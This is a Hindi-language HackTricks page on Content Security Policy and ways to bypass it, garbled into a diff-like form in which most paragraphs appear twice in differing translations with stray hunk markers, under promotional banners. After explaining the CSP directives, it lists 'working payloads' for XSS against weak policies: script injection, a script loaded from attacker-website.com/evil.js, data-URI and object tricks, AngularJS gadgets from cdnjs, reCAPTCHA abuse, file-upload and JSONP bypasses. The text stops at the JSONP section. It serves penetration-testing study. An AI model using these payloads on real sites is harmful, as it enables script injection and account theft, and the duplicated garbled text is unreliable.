* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें.**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
**HackenProof में सभी क्रिप्टो बग बाउंटी होम है।**
[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) सर्वर में शामिल हों और अनुभवी हैकर्स और बग बाउंटी हंटर्स के साथ संवाद करें!
**देरी के बिना पुरस्कार प्राप्त करें**\
HackenProof बाउंटी तभी शुरू होती हैं जब उनके ग्राहक इनाम बजट जमा करते हैं। आपको इनाम उस बग को सत्यापित करने के बाद मिलेगा।
**हैकिंग इनसाइट्स**\
हैकिंग के रोमांच और चुनौतियों के बारे में गहराई से जानकारी प्राप्त करें
**Web3 पेंटेस्टिंग में अनुभव प्राप्त करें**\
ब्लॉकचेन प्रोटोकॉल और स्मार्ट कॉन्ट्रैक्ट्स नई इंटरनेट हैं! इसके उभरते दिनों में web3 सुरक्षा को मास्टर करें।
**रियल-टाइम हैक न्यूज**\
रियल-टाइम न्यूज और इनसाइट्स के माध्यम से हैकिंग की तेज़ गति वाली दुनिया के साथ अपडेट रहें
**Web3 हैकर लीजेंड बनें**\
प्रत्यायित बग के साथ प्रतिष्ठा अंक प्राप्त करें और साप्ताहिक लीडरबोर्ड के शीर्ष पर विजयी बनें।
**नवीनतम घोषणाएँ**\
नवीनतम बग बाउंटीज़ लॉन्चिंग और महत्वपूर्ण प्लेटफॉर्म अपडेट्स के साथ सूचित रहें
[**HackenProof पर साइन अप करें**](https://hackenproof.com/register) और अपने हैक्स से कमाई करें!
{% embed url="https://hackenproof.com/register" %}
**हमसे जुड़ें** [**Discord**](https://discord.com/invite/N3FrSbmwdy) पर और आज ही शीर्ष हैकर्स के साथ सहयोग शुरू करें!
## CSP क्या है
सामग्री सुरक्षा नीति या CSP एक ब्राउज़र की तकनीक है जो **क्रॉस-साइट स्क्रिप्टिंग (XSS) जैसे हमलों से सुरक्षा प्रदान करने में मदद करती है**। यह ब्राउज़र को सुरक्षित रूप से संसाधनों को लोड और चलाने े लिए पथ और स्रोतों ी सूची बनाता है। संसाधनों में चित्र, फ्रेम, जावास्क्रिप्ट और अधिक शामिल हो सकते हैं। यहां एक उदाहरण है जहां स्थानीय डोमेन (स्वयं) से संसाधनों को लोड और इनलाइन में निष्पादित करने और `eval`, `setTimeout` या `setInterval` जैसे स्ट्रिंग कोड निष्पादित करने वाले फ़ंक्शनों की अनुमति होती है:
Content Security Policy या CSP एक ब्राउज़र तकनीक है जो **cross-site scripting (XSS) जैसे हमलों से सुरक्षा प्रदान करती है**। यह पथों और स्रोतों की सूची बनाती है और वर्णन करती है, जिनसे ब्राउज़र सुरक्षित रूप से संसाधनों को लोड कर सकता है। संसाधनों में इमेजेज, फ्रेम्स, जावास्क्रिप्ट और अधिक शामिल हो सकते हैं। यहाँ एक उदाहरण है जहाँ स्थानीय डोमेन (self) से संसाधनों को लोड करने और इन-लाइन निष्पादित करने की अनुमति दी गई है और `eval`, `setTimeout` या `setInterval:` जैसे स्ट्रिंग कोड निष्पादित करने वाले फंक्शन्स की अनुमति दी गई है:
सामग्री सुरक्षा नीति को **प्रतिक्रिया हैडर** या **HTML पेज के मेटा तत्वों** के माध्यम से लागू किया जाता है। ब्राउज़र प्राप्त नीति का पालन करता है और उन्हें गलतियों को सक्रिय रूप से अवरोधित करता है जैसे ही वे पता चलती हैं
Content Security Policy को **प्रतिक्रिया हेडर्स** या **HTML पेज के मेटा तत्वों** के माध्यम से लागू किया जाता है। ब्राउज़र प्राप्त नीति का पालन करता है और उल्लंघनों का पता चलते ही उन्हें सक्रिय रूप से अवरुद्ध करता है
प्रतिक्रिया हडर के माध्यम से लागू किया गया है:
प्रतिक्रिया हडर के माध्यम से लागू किया गया:
```http
Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com; style-src 'self';
```
एक मेटा टैग के माध्यम से लागू किया जाता है:
Implemented via meta tag का हिंदी अनुवाद है:
मेटा टैग के माध्यम से लागू किया गया:
```markup
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
```
### हेडर्स
* `Content-Security-Policy`
* `Content-Security-Policy-Report-Only` यह कुछ नहीं रोकेगा, केवल रिपोर्ट भेजेगा (प्री वातावरण में उपयोग करें)।
* `Content-Security-Policy-Report-Only` यह कुछ भी ब्लॉक नहीं करेगा, केवल रिपोर्ट्स भेजेगा (प्री पर्यावरण में उपयोग करें)।
## संसाधनों को परिभाषित करन
## संसाधनों की परिभाष
CSP कार्य करने के लिए उसे प्राथमिक और गैर-प्राथमिक सामग्री को लोड करने के लिए मूल से प्रतिबंधित करके काम करता है। यह सक्रिय सामग्री के निश्चित पहलुओं को भी प्रतिबंधित कर सकता है, जैसे कि इनलाइन जावास्क्रिप्ट की क्रियान्वयन और `eval()` का उपयोग।
CSP सक्रिय और निष्क्रिय सामग्री को लोड किए जाने वाले मूल स्थानों को प्रतिबंधित करके काम करता है। यह सक्रिय सामग्री के कुछ पहलुओं को अतिरिक्त रूप से प्रतिबंधित कर सकता है जैसे कि इनलाइन जावास्क्रिप्ट का निष्पादन, और `eval()` का उपयोग।
```
default-src 'none';
img-src 'self';
@ -64,39 +66,46 @@ object-src 'none';
```
### निर्देश
* **script-src**: यह निर्देश जावास्क्रिप्ट के लिए अनुमति देता है। इसमें केवल तत्वों में सीधे लोड होने वाले URL ही शामिल होते हैं, साथ ही साथ इनलाइन स्क्रिप्ट इवेंट हैंडलर (onclick) और XSLT स्टाइलशीट भी शामिल होते हैं जो स्क्रिप्ट क्रियान्वयन को ट्रिगर कर सकते हैं।
* **default-src**: यह निर्देश डिफ़ॉल्ट रूप से संसाधनों को प्राप्त करने के लिए नीति का परिभाषित करता है। जब एसपीएस हैडर में फ़ेच निर्देश अनुपस्थित होते हैं, तो ब्राउज़र डिफ़ॉल्ट रूप से इस निर्देश का पालन करता है।
* **Child-src**: यह निर्देश वेब वर्कर्स और एम्बेडेड फ्रेम सामग्री के लिए अनुमति देता है।
* **connect-src**: यह निर्देश fetch, websocket, XMLHttpRequest जैसे इंटरफ़ेस का उपयोग करके URL लोड करने की सीमा लगाता है।
* **frame-src**: यह निर्देश बुलाए जा सकने वाले फ़्रेम के लिए URL की सीमा लगाता है।
* **frame-ancestors**: यह निर्देश वर्तमान पृष्ठ को एम्बेड कर सकने वाले स्रोतों को निर्दिष्ट करता है। यह निर्देश [`<frame>`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/frame), [`<iframe>`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe), [`<object>`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/object), [`<embed>`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/embed), या [`<applet>`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/applet) के लिए उपयोग किया नहीं जा सकता है। यह निर्देश टैग में उपयोग नहीं किया जा सकता है और केवल गैर-एचटीएमएल संसाधनों के लिए ही लागू होता है।
* **img-src**: इसमें वेब पृष्ठ पर छवियों को लोड करने के लिए अनुमति देने वाले स्रोतों को परिभाषित किया जाता है।
* **font-src:** निर्देश फ़ॉन्ट्स के लिए `@font-face` का उपयोग करके लोड होने वाले मान्य स्रोतों को निर्दिष्ट करता है।
* **manifest-src**: यह निर्देश आवेदन मानिफ़ेस्ट फ़ाइलों के अनुमतित स्रोतों को परिभाषित करता है।
* **media-src**: यह निर्देश मीडिया ऑब्जेक्ट को लोड करने के लिए अनुमति देने वाले स्रोतों को परिभाषित करता है।
* **object-src**: यह निर्देश \<object>, \<embed>, और \<applet> तत्वों के लिए अनुमति देने वाले स्रोतों को परिभाषित करता है।
* **base-uri**: यह निर्देश उन URL को परिभाषित करता है जिन्हें एक तत्व का उपयोग करके लोड किया जा सकता है।
* **form-action**: यह निर्देश टैग से सबमिशन के लिए मान्य अंत-बिंदुओं की सूची बनाता है।
* **plugin-types**: यह निर्देश पृष्ठ द्वारा उपयोग किए जा सकने वाले माइम प्रकारों पर सीमाएँ परिभाषित करता है।
* **upgrade-insecure-requests**: यह निर्देश ब्राउज़र को URL योजनाओं को पुनर्लेखित करने के लिए निर्देशित करता है, HTTP को HTTPS में बदलता है। यह निर्देश पुराने URL के बड़े संख्या वाली वेबसाइटों के लिए उपयोगी हो सकता है जिन्हें पुनर्लेखित करने की आवश्यकता होती है।
* **sandbox**: इस निर्देश द्वारा अनुरोधित संसाधन के लिए एक सैंडबॉक्स सक्षम किया जाता है, जो सैंडबॉक्स विशेषता के साथ एक पृष्ठ की क्रियाएँ पर प्रतिबंध लगाता है, जैसे पॉपअप्स को रोकना, प्लगइन और स्क्रिप्ट का क्रियान्वयन रोकना, और समान मूल नीति को प्रयोग करना
* **script-src**: यह निर्देश JavaScript के लिए अनुमत स्रोतों को निर्दिष्ट करता है। इसमें सिर्फ URL जो सीधे तत्वों में लोड होते हैं शामिल नहीं हैं, बल्कि इनलाइन स्क्रिप्ट इवेंट हैंडलर (onclick) और XSLT स्टाइलशीट्स जैसी चीजें भी शामिल हैं जो स्क्रिप्ट निष्पादन को ट्रिगर कर सकती हैं।
* **default-src**: यह निर्देश डिफ़ॉल्ट रूप से संसाधनों की फेचिंग के लिए नीति को परिभाषित करता है। जब CSP हेडर में फेच निर्देश अनुपस्थित होते हैं तो ब्राउज़र डिफ़ॉल्ट रूप से इस निर्देश का पालन करता है।
* **Child-src**: यह निर्देश वेब वर्कर्स और एम्बेडेड फ्रेम सामग्री के लिए अनुमत संसाधनों को परिभाषित करता है।
* **connect-src**: यह निर्देश fetch, websocket, XMLHttpRequest जैसे इंटरफेस का उपयोग करके URL को लोड करने के लिए प्रतिबंधित करता है।
* **frame-src**: यह निर्देश फ्रेम्स के लिए URL को प्रतिबंधित करता है जिन्हें बाहर बुलाया जा सकता है।
* **frame-ancestors**: यह निर्देश उन स्रोतों को निर्दिष्ट करता है जो वर्तमान पृष्ठ को एम्बेड कर सकते हैं। यह निर्देश [`<frame>`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/frame), [`<iframe>`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe), [`<object>`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/object), [`<embed>`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/embed), या [`<applet>`](https://developer.mozilla.org/en-US/docs/Web/HTML/Element/applet) पर लागू होता है। यह निर्देश टैग्स में उपयोग नहीं किया जा सकता और केवल गैर-HTML संसाधनों पर लागू होता है।
* **img-src**: यह वेब पृष्ठ पर छवियों को लोड करने के लिए अनुमत स्रोतों को परिभाषित कता है।
* **font-src:** निर्देश `@font-face` का उपयोग करके लोड किए गए फोंट्स के लिए वैध स्रोतों को निर्दिष्ट करता है।
* **manifest-src**: यह निर्देश एप्लिकेशन मेनिफेस्ट फाइलों के अनुमत स्रोतों को परिभाषित करता है।
* **media-src**: यह मीडिया ऑब्जेक्ट्स को लोड करने के लिए अनुमत स्रोतों को परिभाषित करता है।
* **object-src**: यह \<object>, \<embed>, और \<applet> तत्वों के लिए अनुमत स्रोतों को परिभाषित करता है।
* **base-uri**: यह एक तत्व का उपयोग करके लोड किए जा सकने वाले URL को परिभाषित करता है।
* **form-action**: यह निर्देश टैग्स से सबमिशन के लिए वैध एंडपॉइंट्स की सूची बनाता है।
* **plugin-types**: यह एक पृष्ठ द्वारा आमंत्रित किए जा सकने वाले माइम प्रकारों की सीमाओं को परिभाषित करता है।
* **upgrade-insecure-requests**: यह निर्देश ब्राउज़रों को URL स्कीमों को फिर से लिखने का निर्देश देता है, HTTP को HTTPS में बदलता है। यह निर्देश पुराने URL की बड़ी संख्या वाली वेबसाइटों के लिए उपयोगी हो सकता है जिन्हें फिर से लिखने की आवश्यकता होती है।
* **sandbox**: sandbox निर्देश सैंडबॉक्स विशेषता के समान अनुरोधित संसाधन के लिए एक सैंडबॉक्स सक्षम करता है। यह एक पृष्ठ की क्रियाओं पर प्रतिबंध लगाता है जिसमें पॉपअप्स को रोकना, प्लगइन्स और स्क्रिप्ट्स के निष्पादन को रोकना, और समान-मूल नीति को लागू करना शामिल है
### **स्रोत**
* \*: इससे `data:` , `blob:` , `filesystem:` योजनाएँ को छोड़कर किसी भी URL की अनुमति होती है
* **self**: यह स्रोत परिभाषित करता है कि पृष्ठ पर संसाधनों को एक ही डोमेन से लोड करने की अनुमति है।
* **data**: यह स्रोत डेटा योजना के माध्यम से संसाधनों को लोड करने की अनुमति देता है (उदा बेस64 कोड किए गए छवियाँ)
* \*: यह किसी भी URL को अनुमति देता है सिवाय `data:`, `blob:`, `filesystem:` स्कीमों के
* **self**: यह स्रोत निर्दिष्ट करता है कि पृष्ठ पर संसाधनों की लोडिंग समान डोमेन से अनुमत है।
* **data**: यह स्रोत डेटा स्कीम (उदाहरण के लिए Base64 एन्कोडेड छवियाँ) के माध्यम से संसाधनों को लोड करने की अनुमति देता है।
* **none**: यह निर्देश किसी भी स्रोत से कुछ भी लोड करने की अनुमति नहीं देता है।
* **unsafe-eval**: इससे eval() और इसके समान विधियों का उपयोग स्ट्रिंग से कोड बनाने के लिए किया जा सकता है। इसे किसी निर्देश में शामिल करना सुरक्षित नहीं है। इसी कारण से, इसे असुरक्षित कहा जाता है।
* **unsafe-hashes**: इससे विशेष इनलाइन इवेंट हैंडलर को सक्षम किया जा सकता है।
* **unsafe-inline**: इससे इनलाइन संसाधनों, जैसे इनलाइन तत्व, जावास्क्रिप्ट: URL, इनलाइन इवेंट हैंडलर और इनलाइन तत्वों का उपयोग किया जा सकता है। फिर भी इसे सुरक्षा कारणों के लिए अनुशंसित नहीं किया जाता है।
* **nonce**: एक क्रिप्टोग्राफिक नॉन्स (एक बार उपयोग होने वाली संख्या) का उपयोग करके विशेष इनलाइन स्क्रिप्ट के लिए एक व्हाइटलिस्ट। सर्वर को प्रत्येक बार जब वह नीति प्रसारित करता है, एक अद्वितीय नॉन्स मान उत्पन्न
* **unsafe-eval**: यह eval() और इसी तरह की विधियों का उपयोग करके स्ट्रिंग्स से कोड बनाने की अनुमति देता है। किसी भी निर्देश में इस स्रोत को शामिल करना सुरक्षित अभ्यास नहीं है। इसी कारण, इसे असुरक्षित नाम दिया गया है।
* **unsafe-hashes**: यह विशिष्ट इनलाइन इवेंट हैंडलर्स को सक्षम करने की अनुमति देता है।
* **unsafe-inline**: यह इनलाइन संसाधनों, जैसे कि इनलाइन तत्व, javascript: URL, इनलाइन इवेंट हैंडलर्स, और इनलाइन तत्वों का उपयोग करने की अनुमति देता है। फिर से यह सुरक्षा कारणों से अनुशंसित नहीं है।
* **nonce**: एक क्रिप्टोग्राफिक nonce (एक बार उपयोग किया गया नंबर) का उपयोग करके विशिष्ट इनलाइन स्क्रिप्ट्स के लिए एक व्हाइटलिस्ट। सर्वर को हर बार जब वह एक नीति प्रसारित करता है तो एक अद्वितीय nonce मान उत्पन्न करना चाहिए।
* **sha256-\<hash>**: एक विशिष्ट sha256 हैश के साथ स्क्रिप्ट्स की व्हाइटलिस्ट
* **strict-dynamic**: यह ब्राउज़र को DOM में नए JavaScript टैग्स को लोड करने और किसी "nonce" या "hash" मान द्वारा पहले से व्हाइटलिस्टेड किसी भी स्क्रिप्ट स्रोत से निष्पादित करने की अनुमति देता है।
* **host**: एक होस्ट को संकेत करता है जैसे कि example.com
## असुरक्षित CSP नियम
### 'unsafe-inline'
```yaml
Content-Security-Policy: script-src https://google.com 'unsafe-inline';
```
कार्यक्षमता लोड: `"/><script>alert(1);</script>`
कार्यशील पेलोड: `"/><script>alert(1);</script>`
#### Iframes के माध्यम से self + 'unsafe-inline'
#### self + 'unsafe-inline' आईफ्रेम्स के माध्यम से
{% content-ref url="csp-bypass-self-+-unsafe-inline-with-iframes.md" %}
[csp-bypass-self-+-unsafe-inline-with-iframes.md](csp-bypass-self-+-unsafe-inline-with-iframes.md)
@ -106,24 +115,24 @@ Content-Security-Policy: script-src https://google.com 'unsafe-inline';
```yaml
Content-Security-Policy: script-src https://google.com 'unsafe-eval';
```
कार्यरत पेलोड:
काम करने वाला पेलोड:
```html
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
```
### strict-dynamic
यदि आप किसी भी तरीके से एक **अनुमति प्राप्त JS कोड ने अपने JS कोड के साथ DOM में एक नया स्क्रिप्ट टैग बनाया** है, क्योंकि एक अनुमति प्राप्त स्क्रिप्ट इसे बना रहा है, तो **नया स्क्रिप्ट टैग को निष्पादित करने की अनुमति होगी**।
यदि आप किसी तरह से **अनुमत JS कोड को DOM में एक नया स्क्रिप्ट टैग बनाने के लिए प्रेरित कर सकते हैं** जिसमें आपका JS कोड हो, क्योंकि एक अनुमत स्क्रिप्ट इसे बना रही है, तो **नया स्क्रिप्ट टैग निष्पादित होने के लिए अनुमत होगा**।
### Wildcard (\*)
```yaml
Content-Security-Policy: script-src 'self' https://google.com https: data *;
```
कार्यरत पेलोड:
काम करने वाला पेलोड:
```markup
"/>'><script src=https://attacker-website.com/evil.js></script>
"/>'><script src=data:text/javascript,alert(1337)></script>
```
### ऑब्जेक्ट-एसआरसी और डिफ़ॉल्ट-एसआरसी की कमी
### object-src और default-src की कमी
{% hint style="danger" %}
**ऐसा लगता है कि यह अब काम नहीं कर रहा है**
@ -131,43 +140,39 @@ Content-Security-Policy: script-src 'self' https://google.com https: data *;
```yaml
Content-Security-Policy: script-src 'self' ;
```
कार्यरत पेलोड:
काम करने वाले पेलोड:
```markup
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>
```
### फ़ाइल अपलोड + 'self'
यह तकनीक एक वेब ऐप्लिकेशन में Content Security Policy (CSP) के बाईपास करने के लिए उपयोगी हो सकती है। जब एक वेब ऐप्लिकेशन में CSP निर्धारित होता है, तो वह ब्राउज़र को बताता है कि कौन से संसाधनों को लोड करने की अनुमति है और कौन से नहीं। यदि CSP में 'self' निर्दिष्ट होता है, तो वह ब्राउज़र को बताता है कि केवल वेब ऐप्लिकेशन के अंतर्गत संसाधनों को ही लोड करने की अनुमति है।
इस तकनीक का उपयोग करके, हम फ़ाइल अपलोड फ़ील्ड में अपनी फ़ाइल को अपलोड कर सकते हैं और उसे वेब ऐप्लिकेशन के अंतर्गत संसाधन के रूप में लोड कर सकते हैं। इसके लिए, हमें फ़ाइल अपलोड फ़ील्ड में अपनी फ़ाइल को अपलोड करने के बाद, उसका URL प्राप्त करना होगा। फिर हम उस URL को वेब ऐप्लिकेशन के संसाधन के रूप में उपयोग कर सकते हैं। इस तरीके से, हम CSP को बाईपास करके अनुमति प्राप्त कर सकते हैं अपनी फ़ाइल को लोड करने के लिए।
यह तकनीक केवल उन वेब ऐप्लिकेशनों पर काम करेगी जहां CSP में 'self' निर्दिष्ट होता है और फ़ाइल अपलोड का उपयोग किया जा सकता है।
### फाइल अपलोड + 'self'
```yaml
Content-Security-Policy: script-src 'self'; object-src 'none' ;
```
यदि आप एक JS फ़ाइल अपलोड कर सकते हैं तो आप इस CSP को बाईपास कर सकते हैं:
```markdown
यदि आप एक JS फ़ाइल अपलोड कर सकते हैं, तो आप इस CSP को बायपास कर सकते हैं:
काम करने वाला पेलोड:
```
```markup
"/>'><script src="/uploads/picture.png.js"></script>
```
फिर भी, यह बहुत संभावित है कि सर्वर **अपलोड की गई फ़ाइल की पुष्टि कर रहा है** और केवल निर्धारित प्रकार की फ़ाइलों को ही अपलोड करने देगा
हालांकि, यह बहुत संभावना है कि सर्वर **अपलोड की गई फाइल का मान्यता कर रहा है** और केवल आपको **निश्चित प्रकार की फाइलें अपलोड करने की अनुमति देगा**
इसके अलावा, यदि आप सर्वर द्वारा स्वीकार्य एक्सटेंशन (जैसे: _script.png_) का उपयोग करके फ़ाइल के भीतर **जेएस कोड अपलोड** कर सकते हैं, तो यह काफी नहीं होगा क्योंकि कुछ सर्वर जैसे अपाचे सर्वर **एक्सटेंशन के आधार पर फ़ाइल के MIME प्रकार का चयन** करते हैं और Chrome जैसे ब्राउज़र जेएस कोड को निष्पादित करने से **इनकार करेंगे** जो कि एक छवि होनी चाहिए। "आशा है", यहां गलतियाँ हैं। उदाहरण के लिए, एक CTF से मैंने सीखा है कि **अपाचे नहीं जानता** है _**.wave**_ एक्सटेंशन, इसलिए यह एक **ऑडियो/\*** जैसे MIME प्रकार के साथ सेव नहीं करता है।
इसके अलावा, यदि आप एक **JS कोड को** फाइल में अपलोड कर सकते हैं जिसका एक्सटेंशन सर्वर द्वारा स्वीकार किया जाता है (जैसे: _script.png_) तो भी यह पर्याप्त नहीं होगा क्योंकि कुछ सर्वर जैसे कि अपाचे सर्वर **फाइल के एक्सटेंशन के आधार पर MIME प्रकार का चयन करते हैं** और ब्राउज़र जैसे कि Chrome **Javascript कोड को निष्पादित करने से इनकार कर देंगे** जो कुछ एक इमेज होना चाहिए। "उम्मीद से", गलतियां होती हैं। उदाहरण के लिए, एक CTF से मैंने सीखा कि **अपाचे को** _**.wave**_ एक्सटेंशन के बारे में पता नहीं है, इसलिए यह इसे **MIME प्रकार के रूप में audio/\*** के साथ सेवा नहीं करता है।
यहां से, यदि आपको एक XSS और फाइल अपलोड मिलता है, और आपको एक **गलत अनुवादित एक्सटेंशन** मिलता है, तो आप उस एक्सटेंशन के साथ एक फाइल और स्क्रिप्ट की सामग्री को अपलोड करने का प्रयास कर सकते हैं। या यदि सर्वर ने अपलोड की गई फ़ाइल की सही प्रारूप की जांच कर रहा है, तो एक पॉलीग्लॉट बनाने का प्रयास करें ([यहां कुछ पॉलीग्लॉट उदाहरण](https://github.com/Polydet/polyglot-database))।
यहां से, यदि आपको XSS और एक फाइल अपलोड मिलता है, और आप **गलत समझे गए एक्सटेंशन** को ढूंढने में सफल होते हैं, तो आप उस एक्सटेंशन के साथ एक फाइल अपलोड करने का प्रयास कर सकते हैं और स्क्रिप्ट की सामग्री। या, यदि सर्वर अपलोड की गई फाइल के सही प्रारूप की जांच कर रहा है, तो एक पॉलीग्लॉट बनां ([यहां कुछ पॉलीग्लॉट उदाहरण](https://github.com/Polydet/polyglot-database))।
### थर्ड पार्टी एंडपॉइंट्स + ('unsafe-eval')
### तृतीय पक्ष एंडपॉइंट्स + ('unsafe-eval')
{% hint style="warning" %}
कुछ इसके लिए पेलोड के लिए **`unsafe-eval` की आवश्यकता नहीं होती है**।
निम्नलिखित पेलोड के लिए **`unsafe-eval` की आवश्यकता भी नहीं है**।
{% endhint %}
```yaml
Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
```
एक वंशवादी संस्करण लोड करें और विचारशील JS को क्रियान्वित करें:
एक संवेदनशील संस्करण को लोड करें और मनमाने JS को निष्पादित करें:
```markup
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
@ -188,10 +193,10 @@ With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-a
<img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
>
```
#### Angular + एक पुस्तकालय का उपयोग करके पेलोड ([इस पोस्ट को देखें](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):
#### Angular + फ़ंक्शन्स के साथ लाइब्रेरी का उपयोग करके Payloads जो `window` ऑब्जेक्ट लौटाते हैं ([इस पोस्ट को देखें](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):
{% hint style="info" %}
इस पोस्ट में दिखाया गया है कि आप सभी पुस्तकालयों को `cdn.cloudflare.com` (या किसी अन्य अनुमति प्राप्त JS पुस्तकालयों रेपो) से **लोड** कर सकते हैं, प्रत्येक पुस्तकालय से जोड़ी गई सभी फ़ंक्शनों को निष्पादित कर सकते हैं, और **कौन से पुस्तकालयों के कौन से फ़ंक्शन `window` ऑब्जेक्ट लौटाते हैं** की जांच कर सकते हैं
यह पोस्ट दिखाती है कि आप `cdn.cloudflare.com` (या किसी अन्य अनुमत JS लाइब्रेरीज़ रेपो) से सभी **लाइब्रेरीज़** को **लोड** कर सकते हैं, प्रत्येक लाइब्रेरी से जोड़े गए सभी फ़ंक्शन्स को निष्पादित कर सकते हैं, और जांच सकते हैं **कौन से फ़ंक्शन्स किस लाइब्रेरी से `window` ऑब्जेक्ट लौटाते हैं**।
{% endhint %}
```markup
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
@ -219,9 +224,9 @@ With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-a
```
#### Google recaptcha JS को दुरुपयोग करना
#### गूगल रीकैप्चा JS कोड का दुरुपयोग
[**इस CTF व्राइटअप**](https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?\_x\_tr\_sl=es&\_x\_tr\_tl=hi&\_x\_tr\_hl=es&\_x\_tr\_pto=wapp#noteninja-3-solves) के अनुसार, आप [https://www.google.com/recaptcha/](https://www.google.com/recaptcha/) का दुरुपयोग करके एक CSP के अंदर अनियमित JS कोड को बाइपास कर सकते हैं:
[**इस CTF लेख**](https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?\_x\_tr\_sl=es&\_x\_tr\_tl=en&\_x\_tr\_hl=es&\_x\_tr\_pto=wapp#noteninja-3-solves) के अनुसार आप [https://www.google.com/recaptcha/](https://www.google.com/recaptcha/) का उपयोग करके CSP के अंदर मनमाने JS कोड को निष्पादित कर सकते हैं, CSP को बायपास करते हुए:
```html
<div
ng-controller="CarouselController as c"
@ -232,21 +237,11 @@ ng-init="c.init()"
<script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>
```
### तीसरे पक्ष के एंडपॉइंट + JSONP
एक वेब ऐप्लिकेशन में Content Security Policy (CSP) का उपयोग करके, तीसरे पक्ष के एंडपॉइंट्स के साथ एक सुरक्षा नीति स्थापित की जा सकती है। यह नीति वेब ऐप्लिकेशन को बताती है कि कौन से डोमेन्स पर संसाधित करने की अनुमति है।
इसके बावजूद, तीसरे पक्ष के एंडपॉइंट्स के साथ एक बात है - JSONP (JSON with Padding)। JSONP एक तरह का डेटा प्राप्ति प्रोटोकॉल है जो वेब ऐप्लिकेशन को अन्य डोमेन्स से डेटा प्राप्त करने की अनुमति देता है।
इसका उपयोग करके, हम तीसरे पक्ष के एंडपॉइंट्स के साथ एक CSP बाइपास कर सकते हैं। हम एक `<script>` टैग का उपयोग करके तीसरे पक्ष के एंडपॉइंट पर एक JSONP अनुरोध भेज सकते हैं। इस प्रक्रिया में, वेब ऐप्लिकेशन को तीसरे पक्ष के एंडपॉइंट के साथ संवाद स्थापित करने की अनुमति होती है और इसे अपनी नीति के बाहर जाने की आवश्यकता नहीं होती है।
इस तकनीक का उपयोग करके, हम तीसरे पक्ष के एंडपॉइंट्स से डेटा प्राप्त कर सकते हैं और इसे अपनी वेब ऐप्लिकेशन में प्रदर्शित कर सकते हैं, जबकि CSP नीति को पूरा किया जाता है।
यह तकनीक केवल तब काम करेगी जब तीसरे पक्ष के एंडपॉइंट्स JSONP समर्थित करते हों और वेब ऐप्लिकेशन में CSP नीति सक्षम हो।
### थर्ड पार्टी एंडपॉइंट्स + JSONP
```http
Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';
```
इस तरह की स्थितियों में जहां `script-src` को `self` और एक विशेष डोमेन जिसे व्हाइटलिस्ट किया गया है, सेट किया जाता है, JSONP का उपयोग करके बाईपास किया जा सकता है। JSONP एंडपॉइंट्स असुरक्षित कॉलबैक मेथड्स को संभवतः अनुमति देते हैं, जिससे हमलावर XSS कार्रवाई कर सकता है, कार्यक्षम पेलोड:
